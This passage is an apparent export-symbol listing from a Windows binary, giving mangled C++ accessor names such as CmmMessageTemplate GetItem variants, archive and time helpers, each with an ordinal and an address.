              ?GetFirstChild@CCmmArchiveTreeNode@Archive@Cmm@@UAEPAVICmmArchiveObject@3@ABV?$CStringT@_W@3@@Z26170x458b10
              ?GetFloat@CCmmArchiveVarivant@Cmm@@QBEMXZ26180x459980
              ?GetFullPathNameW@CFileName@Cmm@@QAEXPB_W@Z26190x4125a0
              ?GetGmtTm@CTime@Cmm@@QBEXAAUtm@@@Z26200x411dd0
              ?GetHeadLen@CmmInternelMsg@Cmm@@SAIXZ26210x45f580
              ?GetHeartbeatThreshold@CCmmPerfTelemetry@@SAKXZ26220x4564c0
              ?GetHour@CTime@Cmm@@QBEHXZ26230x402310
              ?GetHourOfDay@CSeconds@Cmm@@QBE_JXZ26240x4119c0
              ?GetHours@CSeconds@Cmm@@QBE_JXZ26250x4119a0
              ?GetImp@CCmmArchiveServiceImp@Archive@Cmm@@SAAAV123@XZ26260x4569a0
              ?GetInt32@CCmmArchiveVarivant@Cmm@@QBEHXZ26270x459960
              ?GetInt64@CCmmArchiveVarivant@Cmm@@QBE_JXZ26280x4599a0
              ?GetItem10@?$CmmMessageTemplate_10@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26290x41a0b0
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@HH@Archive@Cmm@@QAEAAHXZ26300x41bea0
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IHIHV12@H_KHH@Archive@Cmm@@QAEAAHXZ26310x418190
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@QAEAAHXZ26320x41a080
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26330x425ac0
              ?GetItem11@?$CmmMessageTemplate_11@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26340x41a0e0
              ?GetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI@Archive@Cmm@@QAEAAIXZ26350x419c00
              ?GetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@QAEAAHXZ26360x420a80
              ?GetItem12@?$CmmMessageTemplate_12@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26370x41a110
              ?GetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_K@Archive@Cmm@@QAEAA_KXZ26380x419c30
              ?GetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHHH@Archive@Cmm@@QAEAAHXZ26390x4262e0
              ?GetItem13@?$CmmMessageTemplate_13@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26400x41a140
              ?GetItem13@?$CmmMessageTemplate_13@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KH@Archive@Cmm@@QAEAAHXZ26410x419c60
              ?GetItem14@?$CmmMessageTemplate_14@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26420x41a170
              ?GetItem14@?$CmmMessageTemplate_14@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHI@Archive@Cmm@@QAEAAIXZ26430x419c90
              ?GetItem15@?$CmmMessageTemplate_15@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@V32@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26440x41a1a0
              ?GetItem15@?$CmmMessageTemplate_15@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHII@Archive@Cmm@@QAEAAIXZ26450x419cc0
              ?GetItem1@?$CmmMessageTemplate_1@H@Archive@Cmm@@QAEAAHXZ26460x40c930
              ?GetItem1@?$CmmMessageTemplate_1@I@Archive@Cmm@@QAEAAIXZ26470x40c930
              ?GetItem1@?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26480x40c930
              ?GetItem1@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26490x40c930
              ?GetItem1@?$CmmMessageTemplate_1@_J@Archive@Cmm@@QAEAA_JXZ26500x40c930
              ?GetItem2@?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAEAAHXZ26510x417c00
              ?GetItem2@?$CmmMessageTemplate_2@HI@Archive@Cmm@@QAEAAIXZ26520x417c00
              ?GetItem2@?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26530x417c00
              ?GetItem2@?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26540x417c00
              ?GetItem2@?$CmmMessageTemplate_2@H_J@Archive@Cmm@@QAEAA_JXZ26550x418930
              ?GetItem2@?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAEAAHXZ26560x417c00
              ?GetItem2@?$CmmMessageTemplate_2@II@Archive@Cmm@@QAEAAIXZ26570x417c00
              ?GetItem2@?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26580x417c00
              ?GetItem2@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26590x417c00
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEAAHXZ26600x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ26610x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26620x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26630x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@_J@Archive@Cmm@@QAEAA_JXZ26640x418730
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEAAHXZ26650x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEAAIXZ26660x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26670x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26680x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEAA_JXZ26690x418730
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAEAA_KXZ26700x418730
              ?GetItem2@?$CmmMessageTemplate_2@_JH@Archive@Cmm@@QAEAAHXZ26710x418930
              ?GetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26720x418930
              ?GetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26730x418930
              ?GetItem3@?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAEAAHXZ26740x418730
              ?GetItem3@?$CmmMessageTemplate_3@HHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26750x418730
              ?GetItem3@?$CmmMessageTemplate_3@HIH@Archive@Cmm@@QAEAAHXZ26760x418730
              ?GetItem3@?$CmmMessageTemplate_3@HII@Archive@Cmm@@QAEAAIXZ26770x418730
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEAAHXZ26780x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ26790x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26800x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEAAHXZ26810x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEAAIXZ26820x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26830x418390
              ?GetItem3@?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26840x418950
              ?GetItem3@?$CmmMessageTemplate_3@IHI@Archive@Cmm@@QAEAAIXZ26850x418730
              ?GetItem3@?$CmmMessageTemplate_3@IHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26860x418730
              ?GetItem3@?$CmmMessageTemplate_3@IIH@Archive@Cmm@@QAEAAHXZ26870x418730
              ?GetItem3@?$CmmMessageTemplate_3@III@Archive@Cmm@@QAEAAIXZ26880x418730
              ?GetItem3@?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26890x418730
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26900x418390
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEAAHXZ26910x418390
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEAAIXZ26920x418390
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26930x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HH@Archive@Cmm@@QAEAAHXZ26940x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26950x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@QAEAA_JXZ26960x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAEAAHXZ26970x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEAAIXZ26980x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26990x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@I@Archive@Cmm@@QAEAAIXZ27000x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27010x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27020x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@_JV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27030x418760
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@QAEAAHXZ27040x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HI@Archive@Cmm@@QAEAAIXZ27050x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27060x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27070x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IH@Archive@Cmm@@QAEAAHXZ27080x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@II@Archive@Cmm@@QAEAAIXZ27090x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27100x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@QAEAA_JXZ27110x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ27120x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27130x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@_J@Archive@Cmm@@QAEAA_JXZ27140x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_JI@Archive@Cmm@@QAEAAIXZ27150x418760
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_J_J@Archive@Cmm@@QAEAA_JXZ27160x418760
              ?GetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ27170x418760
              ?GetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27180x418760
              ?GetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27190x418760
              ?GetItem4@?$CmmMessageTemplate_4@HHHH@Archive@Cmm@@QAEAAHXZ27200x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@HHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27210x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@HIHI@Archive@Cmm@@QAEAAIXZ27220x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEAAIXZ27230x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ27240x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27250x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27260x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ27270x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27280x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@IHIH@Archive@Cmm@@QAEAAHXZ27290x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@IHII@Archive@Cmm@@QAEAAIXZ27300x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@IHV?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEAA_JXZ27310x418600
              ?GetItem4@?$CmmMessageTemplate_4@IIII@Archive@Cmm@@QAEAAIXZ27320x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@IIV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ27330x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27340x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27350x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHH@Archive@Cmm@@QAEAAHXZ27360x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27370x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27380x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27390x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@III@Archive@Cmm@@QAEAAIXZ27400x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IV12@H@Archive@Cmm@@QAEAAHXZ27410x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@IV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27420x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27430x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ27440x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27450x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27460x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@_JV12@H@Archive@Cmm@@QAEAAHXZ27470x419ff0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HHH@Archive@Cmm@@QAEAAHXZ27480x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HII@Archive@Cmm@@QAEAAIXZ27490x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HIV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27500x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IHI@Archive@Cmm@@QAEAAIXZ27510x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27520x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@I_JI@Archive@Cmm@@QAEAAIXZ27530x418600
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAEAAHXZ27540x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27550x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27560x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ27570x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27580x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27590x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@_J@Archive@Cmm@@QAEAA_JXZ27600x41a740
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_JII@Archive@Cmm@@QAEAAIXZ27610x418790
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_J_JV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27620x418790
              ?GetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27630x418790
              ?GetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@V12@_J@Archive@Cmm@@QAEAA_JXZ27640x419ff0
              ?GetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27650x419ff0
              ?GetItem5@?$CmmMessageTemplate_5@HHHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27660x418600
              ?GetItem5@?$CmmMessageTemplate_5@HHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27670x419af0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@III@Archive@Cmm@@QAEAAIXZ27680x419af0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27690x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAEAAHXZ27700x41a740
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27710x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27720x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@_K@Archive@Cmm@@QAEAA_KXZ27730x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@IHIHI@Archive@Cmm@@QAEAAIXZ27740x418600
              ?GetItem5@?$CmmMessageTemplate_5@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27750x419ff0
              ?GetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27760x41a740
              ?GetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ27770x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27780x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HHV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27790x41a740
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27800x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@_J@Archive@Cmm@@QAEAA_JXZ27810x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAEAAIXZ27820x41a740
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IIIH@Archive@Cmm@@QAEAAHXZ27830x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@IV12@_J@Archive@Cmm@@QAEAA_JXZ27840x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@HH@Archive@Cmm@@QAEAAHXZ27850x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27860x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27870x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@_JV12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27880x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HHHH@Archive@Cmm@@QAEAAHXZ27890x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HIIV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27900x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IHIH@Archive@Cmm@@QAEAAHXZ27910x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@I@Archive@Cmm@@QAEAAIXZ27920x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27930x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HHH@Archive@Cmm@@QAEAAHXZ27940x41a740
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27950x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27960x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@IH@Archive@Cmm@@QAEAAHXZ27970x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAEAAIXZ27980x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAEAAHXZ27990x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28000x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@H@Archive@Cmm@@QAEAAHXZ28010x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@_J_JV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28020x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@IV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28030x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@V12@_JV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28040x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ28050x41a020
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28060x41a020
              ?GetItem6@?$CmmMessageTemplate_6@HHHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28070x419b20
              ?GetItem6@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ28080x41af70
              ?GetItem6@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28090x41af70
              ?GetItem6@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@IIII@Archive@Cmm@@QAEAAIXZ28100x419b20
              ?GetItem6@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28110x4191f0
              ?Get_NotifyType@CSBMBMessage_OutlookMAPIEventChangeNotify@@QAEAAIXZ31610x40c930
              ?Get_OldCount@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEAAIXZ31620x40c930
